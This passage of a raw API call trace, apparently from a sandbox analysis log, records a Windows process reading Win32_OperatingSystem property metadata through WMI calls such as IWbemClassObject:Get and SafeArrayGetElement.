[0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.743] IUnknown:Release (This=0x233e12e51d0) returned 0x1 [0050.743] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.743] SysStringLen (param_1="OSType") returned 0x6 [0050.743] SysStringLen (param_1="Description") returned 0xb [0050.743] SysStringLen (param_1="OSType") returned 0x6 [0050.743] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.743] SysStringLen (param_1="OSType") returned 0x6 [0050.743] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.743] SysStringLen (param_1="OSType") returned 0x6 [0050.743] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.743] SysStringLen (param_1="OSType") returned 0x6 [0050.743] SysStringLen (param_1="OSLanguage") returned 0xa [0050.743] SysStringLen (param_1="OSType") returned 0x6 [0050.743] SysStringLen (param_1="Organization") returned 0xc [0050.743] SysStringLen (param_1="OSType") returned 0x6 [0050.743] SysStringLen (param_1="OSProductSuite") returned 0xe [0050.743] SysStringLen (param_1="OSProductSuite") returned 0xe [0050.743] SysStringLen (param_1="OSType") returned 0x6 [0050.744] IUnknown:Release (This=0x233e12dbb50) returned 0x1 [0050.744] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.744] IWbemClassObject:Get (in: This=0x233e12d95b0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea7d8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTypeDescription", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.744] IWbemClassObject:Get (in: This=0x233e12d95b0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea598, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTypeDescription", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.744] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.744] IWbemClassObject:Get (in: This=0x233e12d95b0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="A string describing the manufacturer and operating system type - used when the operating system property, OSType, is set to 1 (\"Other\"). The format of the string inserted in OtherTypeDescription should be similar in format to the Values strings defined for OSType. OtherTypeDescription should be set to NULL when OSType is any value other than 1.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.744] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.744] lstrlenA (lpString="") returned 0 [0050.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.744] SysStringLen (param_1="A string describing the manufacturer and operating system type - used when the operating system property, OSType, is set to 1 (\"Other\"). The format of the string inserted in OtherTypeDescription should be similar in format to the Values strings defined for OSType. OtherTypeDescription should be set to NULL when OSType is any value other than 1.") returned 0x15b [0050.744] SysStringLen (param_1="") returned 0x0 [0050.745] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.745] IWbemClassObject:Get (in: This=0x233e12d95b0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ef120*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1270fc0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.745] SafeArrayGetLBound (in: psa=0x233e12ef120, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0 [0050.745] SafeArrayGetUBound (in: psa=0x233e12ef120, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0 [0050.745] SafeArrayGetElement (in: psa=0x233e12ef120, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0 [0050.745] IWbemClassObject:Get (in: This=0x233e12e5c90, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxLen", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.745] IWbemClassObject:Get (in: This=0x233e12e5c90, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eeea0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e12711a0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.745] SafeArrayGetLBound (in: psa=0x233e12eeea0, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0 [0050.745] SafeArrayGetUBound (in: psa=0x233e12eeea0, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0 [0050.745] lstrlenW (lpString="CIMTYPE") returned 7 [0050.745] lstrlenW (lpString="MaxLen") returned 6 [0050.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3 [0050.745] lstrlenW (lpString="read") returned 4 [0050.745] lstrlenW (lpString="MaxLen") returned 6 [0050.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="read", cchCount2=4) returned 1 [0050.745] lstrlenW (lpString="write") returned 5 [0050.745] lstrlenW (lpString="MaxLen") returned 6 [0050.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="write", cchCount2=5) returned 1 [0050.745] lstrlenW (lpString="In") returned 2 [0050.745] lstrlenW (lpString="MaxLen") returned 6 [0050.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="In", cchCount2=2) returned 3 [0050.745] lstrlenW (lpString="Out") returned 3 [0050.745] lstrlenW (lpString="MaxLen") returned 6 [0050.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="Out", cchCount2=3) returned 1 [0050.745] SafeArrayGetElement (in: psa=0x233e12eeea0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.746] IUnknown:Release (This=0x233e12e5c90) returned 0x1 [0050.746] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.746] SysStringLen (param_1="Description") returned 0xb [0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.746] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.746] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.746] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.746] SysStringLen (param_1="OSLanguage") returned 0xa [0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.746] SysStringLen (param_1="OSType") returned 0x6 [0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.746] SysStringLen (param_1="Organization") returned 0xc [0050.746] SysStringLen (param_1="Organization") returned 0xc [0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.747] IUnknown:Release (This=0x233e12d95b0) returned 0x1 [0050.747] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.747] IWbemClassObject:Get (in: This=0x233e12dc0b0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eb818, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PlusProductID", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.747] IWbemClassObject:Get (in: This=0x233e12dc0b0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eba48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PlusProductID", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.747] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.747] IWbemClassObject:Get (in: This=0x233e12dc0b0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The PlusProductID property contains the product identification number for the Windows Plus! operating system enhancement software (if installed).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.747] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.747] lstrlenA (lpString="") returned 0 [0050.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc120, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.747] SysStringLen (param_1="The PlusProductID property contains the product identification number for the Windows Plus! operating system enhancement software (if installed).") returned 0x91 [0050.747] SysStringLen (param_1="") returned 0x0 [0050.748] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.748] IWbemClassObject:Get (in: This=0x233e12dc0b0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.748] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.748] SysStringLen (param_1="PlusProductID") returned 0xd [0050.748] SysStringLen (param_1="Description") returned 0xb [0050.748] SysStringLen (param_1="PlusProductID") returned 0xd [0050.748] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.748] SysStringLen (param_1="PlusProductID") returned 0xd [0050.748] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.748] SysStringLen (param_1="PlusProductID") returned 0xd [0050.748] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.748] SysStringLen (param_1="PlusProductID") returned 0xd [0050.748] SysStringLen (param_1="OSLanguage") returned 0xa [0050.748] SysStringLen (param_1="PlusProductID") returned 0xd [0050.748] SysStringLen (param_1="OSType") returned 0x6 [0050.748] SysStringLen (param_1="PlusProductID") returned 0xd [0050.748] SysStringLen (param_1="Organization") returned 0xc [0050.748] SysStringLen (param_1="PlusProductID") returned 0xd [0050.748] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.748] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.748] SysStringLen (param_1="PlusProductID") returned 0xd [0050.749] IUnknown:Release (This=0x233e12dc0b0) returned 0x1 [0050.749] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.749] IWbemClassObject:Get (in: This=0x233e12da070, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1226458, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PlusVersionNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.749] IWbemClassObject:Get (in: This=0x233e12da070, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ee558, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PlusVersionNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.749] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.749] IWbemClassObject:Get (in: This=0x233e12da070, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The PlusVersionNumber property contains the version number of the Windows Plus! operating system enhancement software (if installed).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.749] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.749] lstrlenA (lpString="") returned 0 [0050.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc240, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.750] SysStringLen (param_1="The PlusVersionNumber property contains the version number of the Windows Plus! operating system enhancement software (if installed).") returned 0x85 [0050.750] SysStringLen (param_1="") returned 0x0 [0050.750] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.750] IWbemClassObject:Get (in: This=0x233e12da070, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.750] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.750] SysStringLen (param_1="Description") returned 0xb [0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.750] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.750] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.750] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.750] SysStringLen (param_1="OSLanguage") returned 0xa [0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.750] SysStringLen (param_1="OSType") returned 0x6 [0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.750] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.750] SysStringLen (param_1="PlusProductID") returned 0xd [0050.750] SysStringLen (param_1="PlusProductID") returned 0xd [0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.751] IUnknown:Release (This=0x233e12da070) returned 0x1 [0050.751] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.751] IWbemClassObject:Get (in: This=0x233e12da880, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ee558, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Primary", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.751] IWbemClassObject:Get (in: This=0x233e12da880, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eecd8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Primary", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.751] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.751] IWbemClassObject:Get (in: This=0x233e12da880, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Primary property determines whether this is the primary operating system./nValues: TRUE or FALSE. A value of TRUE indicates this is the primary operating system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.751] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.751] lstrlenA (lpString="") returned 0 [0050.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.751] SysStringLen (param_1="The Primary property determines whether this is the primary operating system./nValues: TRUE or FALSE. A value of TRUE indicates this is the primary operating system.") returned 0xa5 [0050.752] SysStringLen (param_1="") returned 0x0 [0050.752] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.752] IWbemClassObject:Get (in: This=0x233e12da880, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.752] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.752] SysStringLen (param_1="Primary") returned 0x7 [0050.752] SysStringLen (param_1="Description") returned 0xb [0050.752] SysStringLen (param_1="Primary") returned 0x7 [0050.752] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.752] SysStringLen (param_1="Primary") returned 0x7 [0050.752] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.752] SysStringLen (param_1="Primary") returned 0x7 [0050.752] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.752] SysStringLen (param_1="Primary") returned 0x7 [0050.752] SysStringLen (param_1="OSType") returned 0x6 [0050.752] SysStringLen (param_1="Primary") returned 0x7 [0050.752] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.752] SysStringLen (param_1="Primary") returned 0x7 [0050.752] SysStringLen (param_1="PlusProductID") returned 0xd [0050.752] SysStringLen (param_1="Primary") returned 0x7 [0050.752] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.752] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.752] SysStringLen (param_1="Primary") returned 0x7 [0050.752] IUnknown:Release (This=0x233e12da880) returned 0x1 [0050.753] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.753] IWbemClassObject:Get (in: This=0x233e12dab30, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12f0b18, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumLength", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.753] IWbemClassObject:Get (in: This=0x233e12dab30, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12f0968, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumLength", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.753] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.753] IWbemClassObject:Get (in: This=0x233e12dab30, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The QuantumLength property defines the number of clock ticks per quantum. A quantum is a unit of execution time that the scheduler is allowed to give to an application before switching to other applications. When a thread runs one quantum, the kernel preempts it and moves it to the end of a queue for applications with equal priorities. The actual length of a thread's quantum varies across different Windows platforms. For Windows NT/Windows 2000 only.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.753] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.753] lstrlenA (lpString="") returned 0 [0050.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.754] SysStringLen (param_1="The QuantumLength property defines the number of clock ticks per quantum. A quantum is a unit of execution time that the scheduler is allowed to give to an application before switching to other applications. When a thread runs one quantum, the kernel preempts it and moves it to the end of a queue for applications with equal priorities. The actual length of a thread's quantum varies across different Windows platforms. For Windows NT/Windows 2000 only.") returned 0x1c6 [0050.754] SysStringLen (param_1="") returned 0x0 [0050.754] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.754] IWbemClassObject:Get (in: This=0x233e12dab30, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ee9e0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1271010, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.754] SafeArrayGetLBound (in: psa=0x233e12ee9e0, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0 [0050.754] SafeArrayGetUBound (in: psa=0x233e12ee9e0, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0 [0050.754] SafeArrayGetElement (in: psa=0x233e12ee9e0, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0 [0050.754] IWbemClassObject:Get (in: This=0x233e12e2ee0, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.754] IWbemClassObject:Get (in: This=0x233e12e2ee0, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eec60*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e12716d0, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.754] SafeArrayGetLBound (in: psa=0x233e12eec60, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0 [0050.754] SafeArrayGetUBound (in: psa=0x233e12eec60, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0 [0050.754] lstrlenW (lpString="CIMTYPE") returned 7 [0050.754] lstrlenW (lpString="Values") returned 6 [0050.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3 [0050.754] lstrlenW (lpString="read") returned 4 [0050.754] lstrlenW (lpString="Values") returned 6 [0050.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3 [0050.754] lstrlenW (lpString="write") returned 5 [0050.754] lstrlenW (lpString="Values") returned 6 [0050.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1 [0050.755] lstrlenW (lpString="In") returned 2 [0050.755] lstrlenW (lpString="Values") returned 6 [0050.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3 [0050.755] lstrlenW (lpString="Out") returned 3 [0050.755] lstrlenW (lpString="Values") returned 6 [0050.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3 [0050.755] SafeArrayGetElement (in: psa=0x233e12eec60, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.755] SafeArrayGetElement (in: psa=0x233e12eec60, rgIndices=0x350027ed80, pv=0x350027eda0 | 